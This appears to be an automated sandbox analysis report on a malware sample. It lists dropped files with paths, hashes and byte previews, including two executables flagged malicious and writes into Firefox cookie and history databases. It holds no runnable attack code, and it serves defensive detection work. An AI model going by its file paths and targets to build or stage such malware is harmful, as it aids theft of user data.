SHA-512:	CECE17E5863FD6696F9C8555E6594C22807078405F326A6A72CB7C29DB56890B0C9EA966AB87B88F07E67030467A03F20D6B431E8637A90211A019507D99C587
Malicious:	false
Preview:	.....................................................................................................r.r.r.r.r.r.r.r.r.r.r...:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.r.r.r.............................................................................................................................................................r.k.....................r.r.r.r.....0.0.0.0.0.2...0.0.0.0.0.0.0.0.0.4.4.4.4.4.4.4.4.4.4.0.0.0.0.0.r...............................................................................................................r.r.r.r.r.r.r.r.r.............................r.r.....................r.r.........0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0...0.0.0.0.0.0.6.6.6.0.1.2.1.0.0.......................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r................................. .!.!. . ."."...#.#. .!.r.r.r.r.r.r.r.r.r.r.=.=.=.=.=.=.r.r.=.=.=.=.=.=.r.r.=.=.=.=.=

C:\Users\user\AppData\Local\Temp\Usd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	data
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	6.507086619437831
Encrypted:	false
SSDEEP:	768:2OIXyTkAZ0JhMsQf8HgOBsTBJkWVBJV/wJFU3ZHZMwetEOA5p5yMiwsSX1UxoWSd:2OIXyTsJ0Oetj0EJ5MwPOOFU6WS2uoy/
MD5:	A3E3F4669FA720E540FB8F3FEEA3A54E
SHA1:	B0CD2BA80800EADD2FE244B945734D7CF38712E4
SHA-256:	A9A08DEBEC110CABEDB5521C338E68D427F9A1C201B853623FE8F4A3B94F417E
SHA-512:	F3BD14E4B870E2CE9550DE9C30A63925E5E93EC23CBE61DCD2EAA548A8A4A1D866B8A6ECC29E59A4562361A6841865BB69DD55ACF48211970218E8C5BD776F1A
Malicious:	false
Preview:	3.]...U........E.SVW.@...3.\$..0.......N..D$.P.T$..$2..Y..uA.u....,...F..........H..D9.8\9.t..@8.@......D9.8\9.t..@8.X.....8\$...f....t$.Sj.....I..u............0.I..........hL.L..L$..++..Q.L$..wt....t..t$.j.j.....I....M..j.j..H...........H..\|9...D9.t..@8.@......\|9...D9.t..@8...@...+...&..F......L$...n...Lj.P...H..........H..\|9...D9.t..@8.@......\|9...D9.t..@8...@...R+...&..F.......tzj.S....I...uQP..0.I.P...H....S......H..\|9...D9.t..@8.@......\|9...D9.t..@8...@.......&..F.....S..`.I....u........F......._^3.[..]...U..Q.E.SVW.@....E...0.......N..E.P.U..%0...u...Y.......u2.&.3.B.V....H..D9.8\9.t..@8.P..\|9...D9.t..@8.@...&.}..t..E..E...y.....L.j...X...&.3.@.F._^3.[....U......<S.].V.u.W....F..D$......#.3.D$.A.K.3.;.v..F..H........D$...tV.N..........tG.F..0.......F..x..t2.E..@..0.......N..D$.P.T$..%/...\|$..Y..$....D$.......I.Pj.h........I..D$.......................=........F....L$.QP....I.....2....M......j...j.V.t$..K....\|$$.\$(j.j.j.V.._...........(..j.Xj.j.P.t$..F..>.^..\|

C:\Users\user\AppData\Local\Temp\Within

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe
File Type:	GTA2 binary mission script (SCR), Residential area (ste)
Category:	dropped
Size (bytes):	165888
Entropy (8bit):	7.999117209114117
Encrypted:	true
SSDEEP:	3072:w/IVdo4g1Q+F60QkRj/fbNL17YQbxGzds+i2U/ciOUoCiboEmnzjx0KX:fVLg1Q/UTBKQbxXT2FivQ9uzjxX
MD5:	53BD3CA945CDBE9CA0470F75C619714F
SHA1:	B745FA55CDC1297BEACB482F4A4FBD622072FB5C
SHA-256:	D62A0EEEE81532CF6D2254ABDF5CDEB3C1030F60F3DBE893C6108B8E090A0934
SHA-512:	08E11BAE3557615D12F87A3BEE08630E039BEE53BE0089B6AB48108EC205A93E002A26611F88AA133DEFCEF12FBF59FF9C27C4E4DA4CDFC8EB05218D7FE4ADEA
Malicious:	false
Preview:	<..^)Rs..}n.B..~..a..\|J.......;..8...5G..k..-.a..p.9I%}.p....4..V.4m....w2..........Q.....R.[.l..0U...[8.{i.s..e..c....@........9.._.fL.....$.6!..T...lW2.....F<....w..d...h....cv....J.M..h...k.9$.U.u&t.....-gD.{.....-O......}.\.g.r6.R.7..2.....Z..me..Lw...,...y ..{...b..;:..w....~=/}(t.{.h...!.._$+.9...........\|...Ug..r.......m..9...CSh.....s..i..q.....@xA.0V.B.....)....J.p....~."-.......<.B7.Jb.....X...p;...5..e...^h.Z..z..%...aWf-..%N..<h.\..G....%W3{.6Q....k...k.^{.V.V.D...D...]...+...i..^..Hu...-%d.....N....l..a^.3....G&.....T.g.....[........O.u.@5;.....<(.....m.[...\..~....<.N12..VE.2...b..a+...,%.#l...'.0WL.J.&.....P..5u.'...:.U.y.. X.i=.$.@....a....$.a.....!T.x..F..<...#..5..I....t....J..9..Ru..jg..8....[f'rZ..E..j.....;^\|.Z..?...H..9b......d.............h......Iz....iS............}...D...m.=o..H~...b.~...../5..eUMC...?...>.{..UP...O\|m(..M....$y.. ...MS..u.K..P&Y..."?..D..2,.{pp..E...t-8.x.P...^V4...Ws..t....}.].q.V./.

C:\Users\user\AppData\Local\Temp\f784bf58-ac45-46b9-a7fc-8f1c8349a6f9.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135751
Entropy (8bit):	7.804610863392373
Encrypted:	false
SSDEEP:	1536:h+OX7O5AeBWdSq2Zso2iDNjF3dNUPOTy61NVo8OJXhQXXUWFMOiiBIHWI7YyjM/8:pVdSj9hjVn6Oj5fOJR+k0iiW2IPMaIul
MD5:	83EF25FBEE6866A64F09323BFE1536E0
SHA1:	24E8BD033CD15E3CF4F4FF4C8123E1868544AC65
SHA-256:	F421D74829F2923FD9E5A06153E4E42DB011824C33475E564B17091598996E6F
SHA-512:	C699D1C9649977731EEA0CB4740C4BEAACEEC82AECC43F9F2B1E5625C487C0BC45FA08A1152A35EFBDB3DB73B8AF3625206315D1F9645A24E1969316F9F5B38C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........1...c@e.J.~..A...(9=...I.N.e..T......6.7...Kk?....]<.S(.....9}........$..6...:...9..b\|B..8..I..7.8K\.KIn7.:.!^;.H........8.....,.\....b..uC...e?..E.U.........P..G..u!+......C.)Kw...............4..Qye..=$..Q.......?Oi.,O.RW6.k.+.&. .wu..tf....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. ..r.....p..~..3.1.vD.i.]...~...!...<..4KV.~y.).`........>E.NT.%1".%............o.....J._.H.B..w..C......UU.&C..fB&..\|..i..J......I.??^.Z.....Y....0^......?...o.....O.~......W.....~.......R..z.Ma...u]....-.n....2s<....E..6.<..W.H.qh....:j.y...N.D.]Nj....../..a...{....g.....f).~._....1q..L..#.G...Q.w...J."

C:\Users\user\AppData\RoamingAEGIJKEHCA.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1895424
Entropy (8bit):	7.946319035195088
Encrypted:	false
SSDEEP:	49152:S5WXLsGq0QhKVNxzqwp48K5eyCDUcTDqDYomPW:us85c+GK5eyCDUcTDqMome
MD5:	2985641A4880DB928DCF810EAA14041D
SHA1:	42E4ADE4D2329E61D2EAED9564074B41446F5594
SHA-256:	9104F6DBC8F28E0D3AA82F73D0771550A9652C4F6989013C1D6E0779B52CD6C8
SHA-512:	1767FC695A118AC4D3DC17D547CA3704CDB3A5154899B3AB8E7015D5A08210AACE9DC584CAE34AE3EC26FF2555E61D6277A57CF2269551F5EEC947C03424455D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................J...........@...........................K.....(L....@.................................W...k............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .@*.........................@...owfltkii......0.....................@...lwtisuou......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1939456
Entropy (8bit):	7.9495212303989495
Encrypted:	false
SSDEEP:	49152:rWKMHFWJsNZi1WEzbfyDchLRg2ci2zjYlBwK:rWNlWS0dbfkQL22cJzsrV
MD5:	C6620FE2690605F20F5B9C970E8130C6
SHA1:	F5A500BAB75CEC90F2A004566CC61EF6484BE12C
SHA-256:	EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
SHA-512:	C9D30D3000F27D6E2A49A6491CE31E371A6235D53E3E22D3B69D50A932F230F1C425C37AD4E64925418B590933FB4F79C391C895F31C91171930696B37AAFBAB
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@.......................... M.....6x....@.................................W...k.............................L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...etmksbbt.....`2..~..................@...iosnleeh......L......r..............@....taggant.0....L.."...v..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 14:57:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.980462259983791
Encrypted:	false
SSDEEP:	48:8/dIWToy/p8jEHkidAKZdA19ehwiZUklqehly+3:8Tr8ruy
MD5:	D66DE43E6E5D63B812DB01D9C1564C3D
SHA1:	A900FCFD75C25FF228530B28355F22AA013D5A35
SHA-256:	E9A554A643C8C6399D767BD04D7FCA22C57DF145CBEDAF94B221E6D9295246BB
SHA-512:	75CEF11BBCF51E4FC0B964D03DA675738D7B3042BB1DC456AD0FED5A8CD48035E5FFC62C75A225CB51034291C34AF35110323D33837773FBA6C86398FE41D5F9
Malicious:	false
Preview:	L..................F.@.. ...$+.,....Y+.{t...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X%.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X%.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X%.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X%............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X'............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............8e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 14:57:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.996959381742593
Encrypted:	false
SSDEEP:	48:8CdIWToy/p8jEHkidAKZdA1weh/iZUkAQkqehey+2:8Qr8Z9Qzy
MD5:	34975ADB2C81BAE0A60B36A411E23D55
SHA1:	98E05D683ED65F96A3770DBF5D75F78B6C385F48
SHA-256:	D0E5F3883D559B8DD1A33AFBD2EF45575BC7A986A202C602DF4FDD4D4D401057
SHA-512:	9DA10B07B80D43DFA0B89D3B74D0286E738A79DFE28D8378B6D74080ECFCD38FFE56E9CC738F6646315FE5C707C292DEB34E913185FD93A9EFA7F7B05A064D52
Malicious:	false
Preview:	L..................F.@.. ...$+.,....,.{t...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X%.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X%.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X%.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X%............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X'............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............8e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.006020970837963
Encrypted:	false
SSDEEP:	48:8x6dIWToy/psHkidAKZdA14tseh7sFiZUkmgqeh7sEy+BX:8xIrNnay
MD5:	80F2E5F8475BF1090F455F17D1E155E9
SHA1:	389AE93EC76BFB1149C3FC09529C537CDDD1CE9B
SHA-256:	7BDAA095F01400E57165831BE7972C79AC81469644D35EC3D2A4FCECF0C26596
SHA-512:	E0E22A5F312A5695A02AA46635F984EAF801535B79BE37256FAEEA12DE1789324E87C2932BCE398678452A463E09F6D46E738BE25C747BC601A0BF91BFEE3BCA
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X%.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X%.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X%.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X%............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............8e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 14:57:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.993084399103085
Encrypted:	false
SSDEEP:	48:8RdIWToy/p8jEHkidAKZdA1vehDiZUkwqehyy+R:89r86cy
MD5:	FE8CFB4FB86B9E40E71E5FD51D079465
SHA1:	4AE53D960573F7256C43BE6551759E22B9EF3676
SHA-256:	112E0F8691C680EE823FF95A787824C2B297A71CAF3D186A88A7730CA29540C6
SHA-512:	4F0B672FC8DA96455F9DBCC29BF7133E751AC4A34A4856447DB23E96350CEDB0CA9ACA6138E3B041713BD67AF8EE9C9F3700D21EF35D8F5F19FBAEA82A44DA84
Malicious:	false
Preview:	L..................F.@.. ...$+.,......{t...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X%.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X%.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X%.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X%............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X'............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............8e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 14:57:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.980969417809733
Encrypted:	false
SSDEEP:	48:86dIWToy/p8jEHkidAKZdA1hehBiZUk1W1qehAy+C:8Ir869gy
MD5:	0060C686ADC8C27EAAD8CF2AD75387AA
SHA1:	EB34F2861F444CE04AE27318F916BBA095F1CD36
SHA-256:	4801AFFDB4F0923B954B54B490E9167978E451789AFE51154F10D407BA43ECC1
SHA-512:	94F25ADADCE670B18EF6D60AEF4A0AF381236E7234A5C42BD97DFD415A09F6D7F1EB72F11CAED862FD7AD62BB40B0B393DB9A3B5D7CA3427AAF29A7E608D4FED
Malicious:	false
Preview:	L..................F.@.. ...$+.,....D.{t...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X%.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X%.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X%.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X%............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X'............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............8e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jul 26 14:57:13 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.993035232533731
Encrypted:	false
SSDEEP:	48:8ddIWToy/p8jEHkidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbay+yT+:8Zr8ET/TbxWOvTbay7T
MD5:	1140AFA4466899FDF4DF71B068274550
SHA1:	796EBE8575231706F6DB30E96B7F4730720F1DCB
SHA-256:	3188FFB9F1607BD7080A483E36B9CC13412775123CD20B45DA51139E0B62AA03
SHA-512:	35CE0485BF2E89F1894FBC521ECF7BBAE66FFE8322216297FDFCC6488870185BF67D2176D20FD21176006AEBBAF3566BD2B958B0A7B8905262B7FDC0165F02B8
Malicious:	false
Preview:	L..................F.@.. ...$+.,......_{t...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X%.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X%.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X%.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X%............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X'............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............8e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9795
Entropy (8bit):	5.506650219677073
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXK5kHWNBw8M4Sl:PeegJUapHEwU0
MD5:	CC2BCD5656B4B0CCC3B6006C5A3F33F4
SHA1:	C82B41AF02398A4A3C0EF372E3DFFAA282570236
SHA-256:	13936407CE217C20C92B788EF7F7A8EB160BF2201E02332569D1F6CCBDCABA76
SHA-512:	CCD838892A526990EF4683F8E1844658297BCC142B0CFF8E9420BB093A71F46DCBF2DED86AA8109DAC21A8277D9565808738D5A46F1CACE38CF45701847079C5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9795
Entropy (8bit):	5.506650219677073
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXK5kHWNBw8M4Sl:PeegJUapHEwU0
MD5:	CC2BCD5656B4B0CCC3B6006C5A3F33F4
SHA1:	C82B41AF02398A4A3C0EF372E3DFFAA282570236
SHA-256:	13936407CE217C20C92B788EF7F7A8EB160BF2201E02332569D1F6CCBDCABA76
SHA-512:	CCD838892A526990EF4683F8E1844658297BCC142B0CFF8E9420BB093A71F46DCBF2DED86AA8109DAC21A8277D9565808738D5A46F1CACE38CF45701847079C5
Malicious:	false
